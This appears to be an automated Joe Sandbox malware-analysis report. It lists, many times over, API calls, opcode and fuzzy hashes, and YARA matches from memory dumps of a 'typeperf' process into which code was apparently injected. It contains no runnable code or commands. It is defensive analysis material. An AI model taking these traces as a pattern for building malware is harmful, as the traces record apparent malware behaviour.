                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 37f1bda06e02736c1bcf79b0a30cfcdc1d2b4175493e7da1a399c4d30ba5e017
                                                                                                                        • Instruction ID: b83b2e952ddf0339777af608b881cdbf7d34985a845894bd02fe6d631ef79876
                                                                                                                        • Opcode Fuzzy Hash: 37f1bda06e02736c1bcf79b0a30cfcdc1d2b4175493e7da1a399c4d30ba5e017
                                                                                                                        • Instruction Fuzzy Hash: 1E90023571550802D100B15C4554B06100587D0201F65C411B4424968D87958A5169A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b7c8c82c95d64d9db73e688e99a94202045367f0a2f5e9a455eade8b1ad4d5aa
                                                                                                                        • Instruction ID: e138faa18c975dea1cceb8da4771c0756981bb9d9e3003000022ac00632bd422
                                                                                                                        • Opcode Fuzzy Hash: b7c8c82c95d64d9db73e688e99a94202045367f0a2f5e9a455eade8b1ad4d5aa
                                                                                                                        • Instruction Fuzzy Hash: 9990022535545502D150B15C4444A164005A7E0201F55C021B4814994D865589556621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 3f91aa267e219e3ea387a4d6cf9aa97010c200bc98021b092bc23a0cf3677046
                                                                                                                        • Instruction ID: 7f9d0632c8ac32c2335f8f1f611ba503080014968db0bad7eebe8f0cf94b953b
                                                                                                                        • Opcode Fuzzy Hash: 3f91aa267e219e3ea387a4d6cf9aa97010c200bc98021b092bc23a0cf3677046
                                                                                                                        • Instruction Fuzzy Hash: 7EE1A2B2D00218ABDB26DFA4DC81FEEB7BEBF84304F14455DE509A6141EB70A644CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 0-2078129318
                                                                                                                        • Opcode ID: 9762407713ff644817e35d9308df0110265b9fe409896b9acc8cc3034e6ada6e
                                                                                                                        • Instruction ID: eb584b88241855d2d14e759ded352045f5e5e918e7d3a6d9bf01b536023ea16b
                                                                                                                        • Opcode Fuzzy Hash: 9762407713ff644817e35d9308df0110265b9fe409896b9acc8cc3034e6ada6e
                                                                                                                        • Instruction Fuzzy Hash: 5151017A5046D57BC713DB78CC906DABFB8FE8265CB1842C8D5C09B246D7229803CBD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 02930797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: babbf2150a9e427506c817a81ff2192fc319a6fdd0e3fe8d3650435ff123e8f0
                                                                                                                        • Instruction ID: 980e9dd8fc9590073c8a265c03d28f644812967647d81ccff0b2b75824829070
                                                                                                                        • Opcode Fuzzy Hash: babbf2150a9e427506c817a81ff2192fc319a6fdd0e3fe8d3650435ff123e8f0
                                                                                                                        • Instruction Fuzzy Hash: 5401A5B1D4024C7AEF1196E48C81DEF7B7CEF81394F048064FA44A7200D6245E078FA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 02930797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: 0b3140bbe1c2e632b21ba99e7f9170f4a180fa3c975350499debbcf0f4afe7b9
                                                                                                                        • Instruction ID: 9771b0b8af3758fc71cd686b9bbe733bcd25275a68b79f0e3ba9b90a9324db45
                                                                                                                        • Opcode Fuzzy Hash: 0b3140bbe1c2e632b21ba99e7f9170f4a180fa3c975350499debbcf0f4afe7b9
                                                                                                                        • Instruction Fuzzy Hash: 760196B1D4025C7AEB11A6E58C81DFFBB7CEF81794F058064FA54A7240D6285E068FB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0294228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: d36aa3894ec25ac77e325119d23311a03226b07688fb568756581b01f6e36b29
                                                                                                                        • Instruction ID: b39fc1ebe8caa73c860d0c1f5b55b081540cd295e3584518273d0671f205d6dc
                                                                                                                        • Opcode Fuzzy Hash: d36aa3894ec25ac77e325119d23311a03226b07688fb568756581b01f6e36b29
                                                                                                                        • Instruction Fuzzy Hash: A93125B5A00601AFC315DFA4DC84FA6B7B9FF85308F10826EE9898B246DB316615CBD0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0294228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: 20eb749de3e2cb08d55bbf57aa6fc2c2d0147607781f299ef201e781c35a81fb
                                                                                                                        • Instruction ID: 39048a68687625a3f1e57999007048941da91851e7bded90f499e085e4892372
                                                                                                                        • Opcode Fuzzy Hash: 20eb749de3e2cb08d55bbf57aa6fc2c2d0147607781f299ef201e781c35a81fb
                                                                                                                        • Instruction Fuzzy Hash: B331D0B4A00700ABD714DFA4DCC1FABBBB9FB88304F108569ED5D9B285D770A954CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0294228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: 4fb480d5a090fa9bca2caba1a29324f3cd706d0d2dc2d42277a95000270570b3
                                                                                                                        • Instruction ID: 46da66fd4fbf42a17fd549c3ab96da49aacd74c474297b6e3e8f878fa7cb4829
                                                                                                                        • Opcode Fuzzy Hash: 4fb480d5a090fa9bca2caba1a29324f3cd706d0d2dc2d42277a95000270570b3
                                                                                                                        • Instruction Fuzzy Hash: 33319CB5A00704ABD314DFA4DC80FA7B7BDFB88704F10852EEA5D9B285D770A954CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02938A06
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 3188754299-2766056989
                                                                                                                        • Opcode ID: a8ef0e7072dde3be16568fbafaa9278c0397958131a85aa89ada05463a995ce9
                                                                                                                        • Instruction ID: fd0b9c884bf735da9c7045a6e4e48db674deb32dd63f9d9b5b4e8211d0ae75d7
                                                                                                                        • Opcode Fuzzy Hash: a8ef0e7072dde3be16568fbafaa9278c0397958131a85aa89ada05463a995ce9
                                                                                                                        • Instruction Fuzzy Hash: 6D7153B29102186ADB25DBA4CCC5FFBB3BDBF94304F04499DB51997140EB70AB858F60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0293E2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0293E2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02937343,00000010,?,?,?,00000044,?,00000010,02937343,?,?,?), ref: 02945303
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2186235152-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02933F72
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02937343,00000010,?,?,?,00000044,?,00000010,02937343,?,?,?), ref: 02945303
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2186235152-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1BBCDC16,00000007,00000000,00000004,00000000,029336F4,000000F0,?,?,?,?,00000000), ref: 0294524C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1BBCDC16,00000007,00000000,00000004,00000000,029336F4,000000F0,?,?,?,?,00000000), ref: 0294524C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(02931D56,?,0294399B,02931D56,029432B7,0294399B,?,02931D56,029432B7,00001000,?,?,02946A10), ref: 029451FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 029373AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,0293182A,02931F99,029432B7,00000000), ref: 029371C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,0293182A,02931F99,029432B7,00000000), ref: 029371C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
